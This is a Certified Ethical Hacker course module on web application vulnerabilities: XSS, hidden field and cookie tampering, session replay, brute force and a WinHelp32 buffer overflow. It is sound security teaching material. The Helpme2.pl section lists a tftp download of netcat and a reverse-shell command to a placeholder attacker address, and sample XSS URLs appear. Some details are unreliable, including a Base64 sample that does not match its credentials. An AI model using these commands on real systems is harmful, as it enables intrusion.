Module 12 (web application vulnerabilities)

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Web Application Vulnerabilities
Module XII Page 1 of 34 Ethical Hacking and Countermeasures Copyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Ethical Hacking
Module XII
Web Application
Vulnerabilities
Ethical Hacking (EH)
Module XII: Web Application Vulnerabilities
Exam 312-50 Ethical Hacking and Countermeasures

EC-Council
Module Objectives
Understanding Web Application Security
Common Web Application Security
Vulnerabilities
Web Application Penetration Methodologies
Input Manipulation
Authentication And Session Management
Tools: Lynx, Teleport Pro, Black Widow, Web
Sleuth
Countermeasures
Module Objectives
This module examines some of the vulnerabilities that have security implications in the context of
web applications. The objective is to emphasize on the need to secure the applications as they
permit an attacker to compromise a web server or network over the legitimate port of entry. As
more businesses are hosting web based applications as a natural extension of themselves, the
damage that can result as a result of compromise assumes significant proportions. After
completing this module you will be familiar with the following aspects:
• Understanding Web Application Security
• Common Web Application Security Vulnerabilities
• Web Application Penetration Methodologies
• Input Manipulation
• Authentication And Session Management
• Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth
• Countermeasures

EC-Council
Understanding Web Application
Security
User
Firewall
Firewall
Database
Web App
Scripts
Web Server
Let us try to understand what makes web application security different from the general
discussion on security. In the general context, usually an IDS and/firewall can lend some degree
of security. However in the case of web applications, the session takes place through the allowed
port - the default web server port 80. This is equivalent to establishing a connection without a
firewall. Even if encryption is implemented, it only encrypts the transport protocol and in the
event of an attack, the attacker’s session will just be encrypted in nature. Encryption does not
thwart the attack.
Attacking web applications is the easiest way to compromise hosts, networks and users. It is a
challenging task to defend against these attacks as there is no scope for logging the actions
performed. This is particularly true for today’s business applications where a significant
percentage of applications are custom made or sourced from third party software components.
Apart from user awareness and adoption, improper integration of these components can lead to
security concerns. While the trend is to separate the business logic as a separate layer, improper
integration with existing software can result in interruptions in the flow of business logic. This
mismatch may be patched up to complete the functionality of the application. In the process
however, it may give rise to a vulnerability that can be exploited to gain access to the data or
manipulate the business logic that handles the data.
The alarming fact is that generally nobody notices this, until serious damage has been done. To
the end user the application may be functioning as desired. At the organization level, complacency
settles in as the organization considers itself secure due to strong networking security. The fact
that application level attacks take place over a single port of entry legitimately open for business
needs is often forgotten.

EC-Council
Common Web Application
Vulnerabilities
Reliability of Client-Side Data
Special Characters that have not been escaped
HTML Output Character Filtering
Root accessibility of web applications
ActiveX/JavaScript Authentication
Lack of User Authentication before performing
critical tasks.
It has been noted that more often web application vulnerability can be eliminated to a great
extent by the way they are designed. Apart from this, common security procedures are often
overlooked by the functioning of the application.
Reliability of Client-Side Data: It is recommended that the web application rely on server
side data for critical operations rather than the client side data, especially for input purposes.
Special Characters that have not been escaped: Often this aspect is overlooked and special
characters that can be used to modify the instructions by the attackers are found in the web
application code. For example, UTF-7 provides alternative encoding for "<" and ">", and several
popular browsers recognize these as the start and end of a tag.
HTML Output Character Filtering: Output filtering helps a developer build an application
which is not susceptible to cross site scripting attacks. When information is displayed to users, it
should be escaped. HTML should be rendered inactive to prevent cross site scripting attacks.
Root accessibility of web applications: Ideally web applications should not expose the root
directory of the web server. Sometimes, it is possible for the user to access the root directory if he
can manipulate the input or the URL.

ActiveX/JavaScript Authentication: Client side scripting languages are vulnerable to attacks
such as cross side scripting.
Lack of User Authentication before performing critical tasks: An obvious security lapse,
where restricted area access is given without proper authentication, reuse of authentication cache
or poor logout procedures. These applications can be vulnerable to cookie based attacks.

EC-Council
Web Application Penetration
Methodologies
Information Gathering and Discovery
• Documenting Application / Site Map
• Identifiable Characteristics / Fingerprinting
• Signature Error and Response Codes
• File / Application Enumeration
– Forced Browsing
– Hidden Files
– Vulnerable CGIs
– Sample Files
Input/Output Client-Side Data Manipulation
Penetrating web servers are no different from attacking other systems when it comes to the
basic methodology. Here also, we begin with information gathering and discovery. This can be
anything from searching for particular file types / banners on search engines like google. For
examples, searching for “index/” may bring up unsuspecting directories on interesting sites where
one may find information that can be used for penetrating the web server.
Another area of interest is identifying the nature of the web application and going over the site
map to detect weak areas. This may be a link with another site or a link to the intranet itself. The
attacker can go over the source code and find links to other pages, form fields that are vulnerable.
Apart from this, forcing the application to return errors can help in fingerprinting and identifying
the host. This exercise can also reveal vulnerabilities that can be exploited.
File / Application Enumeration can be done through forced browsing, discovering hidden files,
vulnerable CGIs and sample Files.
Finally, the real penetration can be carried out through input or output manipulation on the client
side. These will be detailed in the following pages

EC-Council
Hacking Tool: Instant Source
http://www.blazingtool.com
Instant Source lets you take a
look at a web page's source code,
to see how things are done. Also,
you can edit HTML directly
inside Internet Explorer!
The program integrates into
Internet Explorer and opens a
new toolbar window which
instantly displays the source code
for whatever part of the page you
select in the browser window.
Instant Source is an application that lets the user view the underlying source code as he
browses a web page. The traditional way of doing this has been the View Source command in the
browser. However, the process was tedious as the viewer has to parse the entire text file if he is
searching for a particular block of code. Instant Source allows the user to view the code for the
selected elements instantly without having to open the entire source.
The program integrates into Internet Explorer and opens a new toolbar window, instantly
displaying the source code of the page / selection in the browser window. Instant Source can show
all Flash movies, script files (*.JS, *.VBS), style sheets (*.CSS) and images on a page. All external
files can be demarcated and stored separately in a folder. Moreover, the tool also includes HTML,
JavaScript and VBScript syntax highlighting and support for viewing external CSS and scripts
files directly in the browser. This is not available from the view source command option.
With dynamic HTML, the source code changes after the basic HTML page loads - which is the
HTML that was loaded from the server without any further processing. Instant Source integrates
into Internet Explorer and shows these changes, thereby eliminating the need for an external
viewer.
While this is a handy tool for developers, let us look at possible misuse of this tool. A user with a
malicious intent can scrutinize the source code of a target web application’s interactive web
component. He can even map the structure of the application if the code reveals it. He can get a
rough assessment of the authentication mechanism and session management rendered by the
application.

EC-Council
Hacking Tool: Lynx
http://lynx.browser.org
Lynx is a text-based browser used for downloading source
files and directory links.
Lynx is a fully-featured World Wide Web (WWW) client for users running cursor-
addressable, character-cell display devices (e.g., vt100 terminals, vt100 emulators running on PCs
or Macs, or any other character-cell display). It can display Hypertext Markup Language (HTML)
documents containing links to files on the local system, as well as files on remote systems running
http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to
telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS,
Windows3.x/9x/NT, 386DOS and OS/2 EMX.
Lynx can be used to access information on the Internet, or to build information systems intended
primarily for local access. In addition, Lynx can be used to build systems isolated within a single
LAN. The current developmental Lynx has two PC ports. The ports are for Win32 (95 and NT)
and DOS 386+. There Is a SSL enabled version of Lynx for Win32 by the name of lynxw32.lzh
If the download keystroke command ('d' or D) is used when positioned on a link for an HTML,
plain text, or binary file, Lynx will transfer the file, without rendering, into a temporary location
and present the user with a list of options, just as it does when a link for a binary file of a type for
which no viewer has been mapped is activated.
Moreover, there is a default Download option of Save to disk. This is disabled if Lynx is running
in anonymous mode. Any number of download methods such as kermit and zmodem may be
defined in addition to this default in the lynx.cfg file. Using the Save to disk option under the
PRINT command after viewing the source of an HTML with the VIEW SOURCE () command will
result in a file which differs from the original source in various ways such as tab characters
expanded to spaces. Lynx formats the source presentation in this mode.

EC-Council
Hacking Tool: Wget
www.gnu.org/software/wget/wget.html
Wget is a command line tool for Windows and Unix that
will download the contents of a web site.
It works non-interactively, so it will work in the
background, after having logged off.
Wget works particularly well with slow or unstable
connections by continuing to retrieve a document until the
document is fully downloaded.
Both http and ftp retrievals can be time stamped, so Wget
can see if the remote file has changed since the last
retrieval and automatically retrieve the newversion if it
has.
GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP
and FTP, the two most widely used Internet protocols. It works non-interactively, allowing the
user to enabling work in the background, after having logged off. The recursive retrieval of HTML
pages, as well as FTP sites is supported. Can be used to make mirrors of archives and home pages,
or traverse the web like a WWW robot (Wget understands /robots.txt).
Wget works exceedingly well on slow or unstable connections, keeping getting the document until
it is fully retrieved. Re-getting files from where it left off works on servers (both HTTP and FTP)
that support it. Matching of wildcards and recursive mirroring of directories are available when
retrieving via FTP. Both HTTP and FTP retrievals can be time-stamped, thus Wget can see if the
remote file has changed since last retrieval and automatically retrieve the new version if it has.
By default, Wget supports proxy servers, which can lighten the network load, speed up retrieval
and provide access behind firewalls. However, if behind a firewall that requires a socks style
gateway, the user can get the socks library and compile wget with support for socks.
Most of the features are configurable, either through command-line options, or via initialization
file .wgetrc. Wget allows you to install a global startup file (/etc/wgetrc on RedHat) for site
settings. Wget has many features to make retrieving large files or mirroring entire web or FTP
sites easy, including: resuming aborted downloads, using REST and RANGE, using filename wild
cards and recursively mirror directories, having NLS-based message files for many different
languages, optionally converting absolute links in downloaded documents to relative, so that
downloaded documents may link to each other locally, running on most UNIX-like operating
systems as well as Microsoft Windows, supporting HTTP and SOCKS proxies, persistent HTTP
connections and HTTP cookies

EC-Council
Hacking Tool: Black Widow
http://softbytelabs .com
Black widow is a website
scanner, a site mapping tool, a
site ripper, a site mirroring tool,
and an offline browser program.
Use it to scan a site and create a
complete profile of the site's
structure, files, E-mail addresses,
external links and even link
errors.
Another tool that can be found in an attacker’s arsenal is Black Widow. This tool can be used
for various purposes as it functions as a web site scanner, a site mapping tool, a site ripper, a site
mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker
can use it to mirror the target site on his hard drive and parse it for security flaws in the offline
mode.
The attacker can also use this for the information gathering and discovery phase by scanning the
site and creating a complete profile of the site's structure, files, e-mail addresses, external links
and even errors messages. This will help him launch a targeted attack that has more chance of
succeeding and leaving a smaller footprint.
The attacker can also look for specific file types and download any selection of files: from 'JPG' to
'CGI' to 'HTML' to MIME types. There is no file size restriction as the user can download from
small to large files, in part of a site or in a group of sites.
Additionally, the tool has pre-scan filtering options that can assist the user in configuring his scan
operations. Black Widow will scan HTTP sites, SSL sites (HTTPS) and FTP sites. This can aid in
gathering information regarding authentication mechanisms and session management
techniques.
Another possible use is in following external links and detecting weak security links that can be
exploited to gain access into the web application.

EC-Council
Hacking Tool: WebSleuth
http://sandsprite.com/sleuth/
WebSleuth is an excellent tool that combines spidering
with the capability of a personal proxy such as Achilles.
WebSleuth is an excellent tool that combines spidering with the capability of a personal
proxy. The current Version of Sleuth supports functionality to: Convert Hidden & Select Form
Elements to textboxes; efficient forms parsing and analysis; edit Rendered Source Of WebPages;
edit raw cookies in their raw state etc.
It can also make raw Http requests to servers faking referrer, cookie etc..; Block Javascript
Popups automatically; Highlight & Parse Full HTML Source Code; and Analyze CGI links apart
from logging all Surfing activities and http headers for requests and responses.
Sleuth can generate reports of elements of web page; facilitate enhanced IE proxy management,
as well as Security settings management Sleuth has a facility to monitor Cookies real-time as you
surf. Javascript console aids in interacting directly with the pages scripts and remove all scripts in
a webpage with a click.

EC-Council
Hidden Field Manipulation
Hidden fields are embedded within HTML forms tomaintain
values that will be sent back to the server.
Hidden fields serve as a mean for theweb application to pass
information between different applications.
Using this method, an applicationmay pass the data without
saving it to a common backend system (typically a database.)
A major assumption about the hidden fields is that since they
are non visible (i.e. hidden) they will not be viewed or changed
by the client.
Web attacks challenge this assumption by examining the HTML
code of the page and changing the request (usually a POST
request) going to the server.
By changing the value the entire logic between the different
application parts, the application is damaged and manipulated
to the new value.
Hidden field tampering:
Most of us who have dabbled with some HTML coding have come across the hidden field. For
example, consider the code below:
<input type="hidden" name="ref" size="20" value="http://www.website.com">
<input type="hidden" name="forref" size="20" value="">
<input type="text" name="username" size="20" value="">
Most web applications rely on HTML forms to receive input from the user. However, users can
choose to save the form to a file, edit it and then use the edited form to submit data back to the
server. Herein lies the vulnerability as this is a "stateless" interaction with the web application.
HTTP transactions are connectionless, one-time transmissions.
The conventional way of checking for the continuity of connection is to check the state of the user
from information stored at the user’s end (Another pointer to the fallacy in trusting the client side
data). This can be stored in a browser in three ways; cookies, encoded URLs and HTML form
"hidden" fields
We will be discussing cookies and encoded URLs elsewhere in this module. "Hidden" fields are
preferred by developers as it has lesser overhead and can hold a lot of information. However,
these can be easily tampered with. For instance if an attacker saves a critical form such as
authentication form onto his system, he can view the contents of the file /form including values

in the "hidden" fields. Using a text editor, he can change any of the hidden fields as the web
application implicitly trusts the user input taken by the hidden field.
One way of hedging this risk is to use the HTTP_REFERER header to capture the last page the
user has visited. However, anybody with a little programming knowledge can write a script to
render this check useless. Checking HTTP_REFERER will catch trivial attempts to tamper with
forms, but cannot be relied on for serious web applications. The bottom line is that anything sent
back by a web browser: form fields, HTTP headers, and even cookies can all be tampered with and
must be considered untrustworthy information.
Detecting "hidden" field tampering adds security to web applications, but for critical apps like e-
commerce applications, hidden fields should be avoided at the design level. For instance, consider
someone placing an order at amazon.com and briefly leaving their desk half-way through placing
an order. Anyone with access to the computer can use "view source" to see the credit card
information and other data stored in "hidden" fields (i.e. if it is being used). A best practice in
developing web applications is to avoid storing vital information in "hidden" fields.
Illustration
This is an online shopping cart using hidden field to pass the pricing information between the
order processing system and the order fulfillment system. If the application does not use a
backend mechanism to verify the flow of pricing information then altering the price will lead to
the ability to buy product for smaller amounts and potentially even negative sums.

Countermeasure
The first rule in web application development from a security standpoint is not to rely on the
client side data for critical processes. Using an encrypted session such as SSL / “secure” cookies
are advocated instead of using hidden fields. Digital algorithm may be used where values of
critical parameters may be hashed with a digital fingerprint to ascertain the authenticity of data.
The safest bet would be to rely on server side authentication mechanisms for high security
applications.

EC-Council
Input Manipulation
URL Manipulation CGI Parameter Tampering
HTTP Client-Header Injection
Filter/Intrusion Detection Evasion
Protocol/Method Manipulation
Overflows
In the context of a web based attack (or web server attack), the attacker will first try to probe
and manipulate the input fields to gain access into the web server. They can be broadly
categorized as given below.
URL Manipulation CGI Parameter Tampering: This is perhaps the easiest of the lot. By inserting
unacceptable or unexpected input in the url through the browser, the attacker tries to gauge
whether the server is protected against common vulnerabilities.
HTTP Client-Header Injection: The next accessible point is the HTTP header. Using HTTP tags
such as referrer, the attacker can manipulate the client side to suit his needs.
Filter/Intrusion Detection Evasion: The best part of attacking a web server is that the attacker can
use the default port of entry – namely port 80 – to gain access into the network. As this is a
standard port open for business needs, it is easy to evade intrusion detection systems or firewalls.
Protocol/Method Manipulation: Manipulating the particular protocol or the method used in the
function, the attacker can hack into a web server.
Overflows: Buffer overflows are perhaps the choicest form of attack when there is little else left.
Most web server vulnerabilities take advantage of this. The advantage is that by using buffer
overflow techniques, the attacker can also make the server execute a code of his choice, making it
easier for him to exploit the server further.

EC-Council
What is Cross Side Scripting (XSS)?
A Web application vulnerable to XSS allows a user to
inadvertently send malicious data to self through that
application.
Attackers often perform XSS exploitation by crafting
malicious URLs and tricking users into clicking on
them.
These links cause client side scripting languages
)VBScript, JavaScript etc,) of the attacker's choice to
execute on the victim's browser.
XSS vulnerabilities are caused by a failure in the web
application to properly validate user input.
A cross-site scripting vulnerability is caused by the failure of a web based application to
validate user supplied input before returning it to the client system. “Cross-Site” refers to the
security restrictions that the client browser usually places on data (i.e. cookies, dynamic content
attributes, etc.) associated with a web site. By causing the victim’s browser to execute injected
code with the same permissions as the web application domain, an attacker can bypass the
traditional Document Object Model (DOM) security restrictions. The Document Object Model is a
accessible application interface that allows Client-Side Languages to dynamically access and
modify the content, structure and style of a web page.
Cross-Site Scripting (CSS) attacks require the execution of Client-Side Languages (JavaScript,
Java, VBScript, ActiveX, Flash, etc.) within a user’s web environment. Client-Side Languages
have the power to access and manipulate the DOM within a browser. Cross Site Scripting can
result in an attacker stealing cookies, hijacking sessions, changing of web application account
settings, spreading of a worm, etc. The access that an intruder has to the Document Object Model
(DOM) is dependent on the security architecture of the language chosen by the attacker. For
instance, Java applets do not provide the attacker with any access beyond the DOM and are
restricted to the sandbox.
The most common web components that are vulnerable to CSS attacks include CGI scripts, search
engines, interactive bulletin boards, and custom error pages with poorly written input validation
routines. Moreover, a victim does not necessarily have to click on a link to make the attack
possible. CSS code can also be made to load automatically in an HTML e-mail with certain
manipulations of the IMG or IFRAME HTML tags.

Brief Example Attack:
Example 1: The IMG tag
http://host/search/search.cgi?query=< img%20src=http://host2/fake-article.jpg>
Depending on the website setup, this generates html with the image from host2 and feeds it to the
user when they click on this link. Depending on the original web page layout it may be possible to
deceive a user into thinking this is a valid part of the article.
Example 2:
http://host/something.php?q=< img%20src=javascript:something-wicked-this-way-comes>
If a user clicks on this link a JavaScript popup box displaying the site’s domain name will appear.
While this example isn't harmful, an attacker could create a falsified form or, perhaps create
something that grabs information from the user. The request above is easily questionable to a
standard user but with hex, unicode, or %u windows encoding a user could be fooled into thinking
this is a valid site link.
Example 3:
http://host/< script>Insert stuff here
This particular request is very common example.

EC-Council
Authentication And Session
Management
Brute/Reverse Force
Session Hijacking
Session Replay
Session Forgoing
Page Sequencing
Brute Force
Brute Forcing involves performing an exhaustive key search of a web application authentication
token's key space in order to find a legitimate token that can be used to gain access.
According to rfc2617, the Basic Access Authentication scheme of HTTP is not considered to be a
secure method of user authentication (unless used in conjunction with some external secure
system such as SSL), as the user name and password are passed over the network as cleartext. To
receive authorization, the client sends the userid and password, separated by a single colon (":")
character, within a base64 [7] encoded string in the credentials.
basic-credentials = base64-user-pass
base64-user-pass = <base64 encoding of user-pass, except not limited to 76 char/line>
user-pass = userid ":" password
userid = *<TEXT excluding ":">
password = *TEXT
For instance, if the user agent wishes to send the userid "Winnie" and password "the pooh", it
would use the following header field:
Authorization: Basic bjplc2vcGZQQWxRpVuIHhZGNFt==
Therefore, it is relatively easy to brute force a protected page if an attacker uses decent dictionary
lists. For the page http://www.victim.com/private/index.html, an attacker can generate base 64

encoded strings with commonly used usernames and a password, generate HTTP requests, and
look for a non-404 response:
Session Replay
If a user's authentication tokens are captured or intercepted by an attacker, the session can be
replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a
replay attack, an attacker openly uses the captured or intercepted authentication tokens such as a
cookie to create or avail service from the victim's account; thereby bypassing normal user
authentication methods.
A simple example is sniffing a URL with a session ID string and pasting it back into the attacker’s
web browser. The legitimate user may not necessarily need to be logged into the application at the
time of the replay attack.
In a typical web application logon scenario, two authentication tokens are exchanged - a user
identifier and password - for a single authentication token (or session ID), which is thereafter
used as the only authentication string. While it is generally clear that username/password pairs
are indeed authentication data and therefore sensitive, it is not generally understood that these
generated authentication tokens are also just as sensitive. Many users who may have extremely
hard-to-guess passwords are careless with the protection of cookies and session information that
can be just as easily used to access their accounts in a replay attack. This is often considered
forging "entity authentication" since most applications check the tokens stored in the browser or
HTTP stream, and do not require user authentication after each web request.
By simply sniffing a HTTP request of an active session or capturing a desktop user's cookie files, a
replay attack can be very easily performed. Exploitation can take the following general forms:
• Visiting a pre-existing dynamically created URL that is assigned to a specific user's
account which has been sniffed or captured from a proxy server log
• Visiting a specific URL with a preloaded authentication token (cookie, HTTP header
value, etc.) captured from a legitimate user
• A combination of 1 and 2.
Session tokens that do not expire on the HTTP server can allow an attacker unlimited time to
guess or brute force a valid authenticated session token. An example is the "Remember Me"
option on many retail websites. If a user's cookie file is captured or brute-forced, then an attacker
can use these static-session tokens to gain access to that user's web accounts. Additionally,
session tokens can be potentially logged and cached in proxy servers that, if broken into by an
attacker, may contain similar sorts of information in logs that can be exploited if the particular
session has not been expired on the HTTP server. To prevent Session Hijacking and Brute Force
attacks from occurring to an active session, the HTTP server can seamlessly expire and regenerate
tokens to give an attacker a smaller window of time for replay exploitation of each legitimate
token. Token expiration can be performed based on number of requests or time.

Session Forging/Brute-Forcing Detection and/or Lockout
Many websites have prohibitions against unrestrained password guessing (e.g., it can temporarily
lock the account or stop listening to the IP address). With regard to session token brute-force
attacks, an attacker can probably try hundreds or thousands of session tokens embedded in a
legitimate URL or cookie for example without a single complaint from the HTTP server. Many
intrusion-detection systems do not actively look for this type of attack; penetration tests also often
overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session
tokens that never actually get assigned but will detect if an attacker is trying to brute force a range
of tokens. Resulting actions can either ban originating IP address (all behind proxy will be
affected) or lock out the account (potential DoS). Anomaly/misuse detection hooks can also be
built in to detect if an authenticated user tries to manipulate their token to gain elevated
privileges.
Session Re-Authentication
Critical user actions such as money transfer or significant purchase decisions should require the
user to re-authenticate or be reissued another session token immediately prior to significant
actions. Developers can also somewhat segment data and user actions to the extent where re-
authentication is required upon crossing certain "boundaries" to prevent some types of cross-site
scripting attacks that exploit user accounts.
Session Token Transmission
If a session token is captured in transit through network interception, a web application account
is then trivially prone to a replay or hijacking attack. Typical web encryption technologies include
but are not limited to Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1)
protocols in order to safeguard the state mechanism token.
Session Tokens on Logout
With the popularity of Internet Kiosks and shared computing environments on the rise, session
tokens take on a new risk. A browser only destroys session cookies when the browser thread is
torn down. Most Internet kiosks maintain the same browser thread. It is recommended to
overwrite session cookies when the user logs out of the application.
Page Sequencing
Page sequencing is the term given to the vulnerability that arises as a result of poor session
management, thereby allowing the user to take an out of turn action and bypass the defined
sequence of web pages. This can be something like moving ahead to a later stage of a financial
transaction. This arises due to faulty session/application state management.

EC-Council
Traditional XSS Web Application
Hijack Scenario - Cookie stealing
User is logged on to a web application and the session is
currently active. An attacker knows of a XSS hole that affects
that application.
The user receives a malicious XSS link via an e-mail or
comes across it on a web page. In some cases an attacker can
even insert it into web content (e.g. guest book, banner, etc,)
and make it load automatically without requiring user
intervention.
It is a fact that most web sites address security use SSL for authenticating their login
sessions. Let us see how this process takes place. When the client connects to a web site two
events take place to ensure security.
1. The web site must prove that it is the web site it claims to be.
The website authenticates itself by the SSL certificate issued to the domain in question by a
trusted third party. Depending on the extent the user trusts the certificate issuer; s/he can be
assured that the web site is what it claims to be.
Once the website is authenticated by the user, he can choose to establish a secure data connection
via the public key mechanism of SSL so that all the data that is transmitted between them is
encrypted.
2. The user must authenticate self to the web site
The user provides his username/password into a form and this data is transmitted in an
encrypted fashion to the web site for authentication. If the client is authenticated, a session cookie
is generated with appropriate timeout and validation information. This is sent back to the user as
a "secure cookie" - i.e. one that is only passed back and forth over SSL.
This can be considered as passing a shared secret back and forth, which is encrypted and is not
the actual password and does timeout. If the website does not use cookies, it can opt for session
codes that are embedded in the site URLs so that they are never stored in the hard disk of the
client computer. Some web sites do require their users to obtain client SSL certificates so that the

web site can authenticate the clients via these certificates and thus not need this whole
username/password scheme.
Cookies were originally introduced by Netscape and are now specified in RFC 2965 (which
supersedes RFC 2109), with RFC 2964 and BCP44 offering guidance on best practice. Cookies
were never designed to store usernames and passwords or any sensitive information. There are
two categories of cookies, secure or non-secure and persistent or non-persistent, giving four
individual cookies types.
• Persistent and Secure
• Persistent and Non-Secure
• Non-Persistent and Secure
• Non-Persistent and Non-Secure
Persistent vs. Non-Persistent
Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for
Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below).
Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is
closed or the cookie is explicitly killed by a log-off script.
Secure vs. Non-Secure
Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS
or regular HTTP. The title of secure is somewhat misleading. It only provides transport security.
Any data sent to the client should be considered under the total control of the end user, regardless
of the transport mechanism in use.
Working
Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is
becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an
HTTP response header. Cookies enable a server and browser to pass information among
themselves between sessions. Remembering HTTP is stateless, this may simply be between
requests for documents in a same session or even when a user requests an image embedded in a
page. It is rather like a server stamping a client, and saying show this to me next time you come
in. Cookies can not be shared (read or written) across DNS domains. In correct client operation
Ddomain A can't read Domain B's cookies, but there have been many vulnerabilities in popular
web clients which have allowed exactly this. Under HTTP the server responds to a request with an
extra header. This header tells the client to add this information to the client's cookies file or store
the information in RAM. After this, all requests to that URL from the browser will include the
cookie information as an extra header in the request.

Cookie Structure
domain: The website domain that created and that can read the variable.
flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the
variable.
path: The path attribute supplies a URL range for which the cookie is valid. If path is set to
/reference, the cookie will be sent for URLs in /reference as well as sub-directories such
as/reference/web protocols. A pathname of " / " indicates that the cookie will be used for all URLs
at the site from which the cookie originated.
secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to
access the variable.
expiration: The time that the variable will expire on. Omitting the expiration date signals to the
browser to store the cookie only in memory; it will be erased when the browser is closed.
name: The name of the variable (in this case Apache).
The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies
per server or domain is allowed.
Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are
however also used as a convenient mechanism to store user preferences and other data including
session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by
the client and sent to the server with URL requests. Therefore any malicious user can modify
cookie content to his advantage. There is a popular misconception that non-persistent cookies
cannot be modified but this is not true; tools like Winhex are freely available. SSL also only
protects the cookie in transit.
The extent of cookie manipulation depends on what the cookie is used for but usually ranges from
session tokens to arrays that make authorization decisions. (Many cookies are Base64 encoded;
this is an encoding scheme and offers no cryptographic protection).
Example from a real world example
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
The attacker can simply modify the cookie to;
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;

EC-Council
XSS Countermeasures
As a web application user, there are a few ways to protect
yourselves from XSS attacks.
The first and the most effective solution is to disable all
scripting language support in your browser and email
reader.
If this is not a feasible option for business reasons,
another recommendation is to use reasonable caution
while clicking links in anonymous e-mails and dubious
web pages.
Proxy servers can help filter out malicious scripting in
HTML.
Preventing cross-site scripting is a challenging task especially for large distributed web
applications. If the application accepts only expected input, then the XSS can be significantly
reduced.
Web pages with unspecified character-encoding work mostly because most character sets assign
the same characters to byte values below 128. Some 16-bit character-encoding schemes have
additional multi-byte representations for special characters such as "<. These should be checked.
Web servers should set the character set, and then make sure that the data they insert is free from
byte sequences that are special in the specified encoding. This can typically be done by settings in
the application server or web server. The server should define the character set in each html page
as below.
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
The above tells the browser what character set should be used to properly display the page. In
addition, most servers must also be configured to tell the browser what character set to use when
submitting form data back to the server and what character set the server application should use
internally. The configuration of each server for character set control is different, but is very
important in understanding the canonicalization of input data. Control over this process also
helps markedly with internationalization efforts. Filtering special meta characters is also
important. HTML defines certain characters as "special", if they have an effect on page
formatting.
In an HTML body:

"<" introduces a tag.
"&" introduces a character entity.
Note : Some browsers try to correct poorly formatted HTML and treat ">" as if it were "<".
In attributes:
• double quotes mark the end of the attribute value.
• single quotes mark the end of the attribute value.
• "&" introduces a character entity.
In URLs:
• Space, tab, and new line denote the end of the URL.
• "&" denotes a character entity or separates query string parameters.
• Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) are not
allowed in URLs.
• The "%" must be filtered from input anywhere parameters encoded with HTTP escape
sequences are decoded by server-side code.
Ensuring correct encoding of dynamic output can prevent malicious scripts from being passed to
the user. While this is no guarantee of prevention, it can help contain the problem in certain
circumstances. The application can make a explicit decision to encode un-trusted data and leave
trusted data untouched, thus preserving mark-up content.

EC-Council
Buffer Overflow in WINHLP32.EXE
A buffer-overrun vulnerability in WINHLP32.EXE could
result in the execution of arbitrary code on the vulnerable
system.
This vulnerability stems from a flaw in the Item parameter
within WinHLP Command.
This exploit would execute in the security context of the
currently logged on user.
Microsoft has released Windows 2000 Service Pack 3
(SP3), which includes a fix for this vulnerability.
The Windows Help utility parses and displays help information for applications. The help
information is contained in files of several types that are generated by the Help Compiler (part of
the AppWizard utility), and is stored by default in the WINNThelp folder. By default, users can
write to this folder.
The Help tool parses and displays Help information for programs. The Help information is
contained in several file types that are generated by the Microsoft Help Compiler program and are
stored (by default) in the %SystemRoot%Help folder. Users have both Read and Write
permissions to this folder by default.
An unchecked buffer exists in the Help utility, and a Help file that has been carefully modified
could be used to run a program on the local computer using a buffer overrun technique. When a
user activates the Windows Help file tool (for example, by pressing the F1 key) this vulnerability
may be used to run a program and may cause the Help file tool to stop responding (hang). The
buffer overrun in winhlp32.exe occurs when it attempts to read a .cnt file with an overly long
heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32
just truncates the entry.
Winhlp32.exe is vulnerable to a buffer overrun attack using the Item parameter within WinHlp
Command, the item parameter is used to specify the file path of the WinHelp (.hlp) file in which
the WinHelp topic is stored, and the window name of the target window. Using this overrun, an
attacker can successfully execute arbitrary code on a remote system by either encouraging the
victim to visit a particular web page, whereby code would execute automatically, or by including
the exploit within the source of an email. In regards to email, execution would automatically
occur when the mail appears in the preview pane and ActiveX objects are allowed (This is allowed

by default, the Internet Security Settings would have to be set as HIGH to prevent execution of
this vulnerability). Any exploit would execute in the context of the logged on user.
Because the Help Compiler program's output files do not generate the specific malformation at
issue here, this vulnerability could not be accidentally exploited. The machines primarily at risk
from this vulnerability are workstations, terminal servers, and other machines that allow users to
log on interactively and add or modify help files. Though there is no capability to directly attack a
remote machine via this vulnerability, the local machine can be affected.

EC-Council
Hacking Tool: Helpme2.pl
Helpme2.pl is an exploit code for WinHelp32.exe Remote
Buffer Overrun vulnerability.
This tool generates an HTML file with a given hidden
command.
When this HTML file is sent to a victim through e mail, it
infects the victim's computer and executes the hidden
code.
Helpme2.pl is an exploit code written to take advantage of the winhelp32.exe vulnerability.
The perl script takes a command to execute (WinExec,SW_HIDE) and gives a html output file.
There are two versions
HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272
HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778
The exploit does the following:
1) Executes tftp.exe -i attacker.ip.address get nc.exe c:winntsystem32nc.exe
2) Executes nc.exe attacker.ip.address 80 -e cmd.exe
This code generates an HTML file with a given hidden command. When the HTML file is sent to a
victim through e mail, it infects the victim's computer and executes the hidden code.

EC-Council
Hacking Tool: WindowBomb
An email sent with this html file attached will create pop-up windows
until the PC's memory gets exhausted.
JavaScript is vulnerable to simple coding such as this.
Window bombs are code written to cause annoying behavior on the user’s computer screen.
